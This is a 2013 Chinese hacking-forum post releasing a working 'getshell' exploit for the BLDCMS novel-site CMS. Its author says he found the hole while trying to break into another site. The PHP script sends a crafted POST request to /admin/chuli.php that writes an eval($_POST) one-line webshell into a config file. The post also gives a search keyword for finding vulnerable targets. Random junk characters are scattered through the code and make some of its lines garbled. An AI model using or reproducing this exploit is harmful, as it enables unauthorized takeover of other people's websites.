找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2172|回复: 0
打印 上一主题 下一主题

BLDCMS(白老大小说) Getshell 0day EXP

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-26 20:49:10 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
之前想搞一个黑阔站 发现旁站有一个站用了BLDCMS 我就下载看了.. 找到了一个getshell漏洞" S1 c2 d- X0 ~

+ ]. T, x, g4 p- j6 m
1 |* o: w) G* o+ _- w  A: c话说昨晚晴天小铸在90sec发现有人把这getshell漏洞的分析发出来了 擦 居然被人先发了 7 W' H8 f( ?7 k" E

; ?: P. o% V; G2 k2 t$ s, l5 g6 W既然都有人发了 我就把我之前写好的EXP放出来吧6 s1 ?8 \& ]* n) |9 @
, t. b0 E" y9 g+ ?5 W
view source print?01.php;">
0 B& S, k0 M. n02.<!--?php, k2 p: L/ |. `
03.echo "-------------------------------------------------------------------
! N9 Y+ [# @2 p+ R04. ' E, K2 G6 y, ~/ k; u6 U. }4 \+ T
05.------------\r\n              BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP
$ o6 I' U6 U' ~* s3 p06. / `, h% @: ^) k, R* B8 I
07.(GPC=Off)\r\n            Vulnerability discovery&Code by 数据流@wooyun( S7 S2 r: |/ k
08. * B+ g- J; b, y# E1 {, z/ G
09.QQ:981009941\r\n                                2013.3.21\r\n             3 H5 P7 y  B% [, P; F; f/ v
10.
& S) |( g8 e- @" e. R+ x* ?11. 6 J! j' _' b$ q' K3 y; t
12.用法:php.exe EXP.php www.baidu.com /cms/ pass(一句话密码
+ X$ T% `' h0 h: p3 T+ i! J13. . N  M6 f- Q$ {+ S$ p
14.)\r\n                    搜索关键字:\"开发者: 白老大小说\"\r\n-----------
# @" E4 A. j: S2 u! l4 L7 f15.
6 p$ a& k( q# F0 w& P( s16.--------------------------------------------------------------------\r\n";1 V) P( }0 r# s  C5 A. x
17.$url=$argv[1];1 D$ O) x+ L0 i  ~( f( I
18.$dir=$argv[2];
) b9 E4 u3 T+ I8 Y: t& u19.$pass=$argv[3];
! t' _1 t1 o" E3 p& E. }: g- t+ w20.$eval='\';eval($_POST['.'"'.$pass.'"'.']);\'';( M) _0 C& A' i
21.if (emptyempty($pass)||emptyempty($url))
5 S. m: ~+ |# Q4 S5 c0 y; c6 m22.{exit("请输入参数");}: A! A# X0 t$ ~4 v, j6 w. D+ G
23.else  M; T2 ]0 l; |7 P3 q
24.{
( H8 c; t2 ]* f25.$fuckdata='sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite='.$ev, H* w* ^4 S, l+ F: q+ V
26. : @1 X- _2 j& |- u
27.al;
0 s/ `+ x; E; ?( V. I28.$length = strlen($fuckdata);3 X0 Q' s; T2 E1 r2 Q9 V
29.function getshell($url,$pass)
+ _; ~+ G3 E5 a. g+ S+ K% ?. l30.{" e: T# C8 }/ u+ F3 L
31.global $url,$dir,$pass,$eval,$length,$fuckdata;
4 G; H; d% R  T2 x1 @' ^3 K32.$header = "OST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";" O$ a8 v) K0 c" [( v* u
33.$header .= "Content-Type: application/x-www-form-urlencoded\r\n";
6 q& L9 e; }/ T: I4 E) F3 O34.$header .= "User-Agent: MSIE\r\n";: X. J& j6 h* D* [
35.$header .= "Host:".$url."\r\n";2 ^& o' P! ]1 E9 J' D) p
36.$header .= "Content-Length: ".$length."\r\n";& B0 M, O% f. e- H" n
37.$header .= "Connection: Close\r\n";
1 u9 {  D% A+ D: \9 D38.$header .="\r\n";8 h- Y9 ?/ F+ ^! k
39.$header .= $fuckdata."\r\n\r\n";
( |! K1 ~% Z: {: f: g* Z40.$fp = fsockopen($url, 80,$errno,$errstr,15);
! }& j: Z" s2 U2 A/ A" v41.if (!$fp): V6 K6 h/ K# e, k# ?$ p2 w
42.{/ A2 L) \/ V3 [: j7 f
43.exit ("利用失败:请检查指定目标是否能正常打开");+ {9 }  [( A/ o4 [: I7 E
44.}
  `  h( }2 p( y" @45.else{ if (!fputs($fp,$header))
8 Q7 P, m6 i0 i46.{exit ("利用失败");}) k) z1 s1 V& V5 _2 E, x
47.else
4 T/ ^( z+ }" E- m, Z" B1 ?$ M8 i48.{1 x5 s( B2 t; {$ C; b
49.$receive = '';" n, ?2 C8 H6 N0 U6 {2 ^
50.while (!feof($fp)) {: m) m: f* P6 I' v/ R5 i3 R
51.$receive .= @fgets($fp, 1000);+ W; A2 B* }! s3 E2 A4 _
52.}
) A7 a, m  C* b# f53.@fclose($fp);  `; a, b* R( }% f* Z4 `
54.echo "$url/$dir/conn/config/normal2.php passpass(如连接失败 请检查目标- O0 I6 g, @1 H( w
55. $ {; p: {  c% v7 X+ ]' b
56.GPC是否=off)";
0 _4 H% {7 |' ]* g0 [57.}}
+ c7 m3 s3 I- ~( \58.}
) D; e0 X6 P) n* m59.}
$ z9 e: N7 p% Y/ b3 C8 p60.getshell($url,$pass);
! p& a# x$ d: ~- ?61.?-->
; o. r; n9 }$ r
4 J( n5 z! O6 h& o( o. H$ R
" t$ u; ~* e6 O% l8 J: f
- v! M! T7 E2 w1 C8 ^) Q" }by 数据流
/ ~4 H6 e/ j# |
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表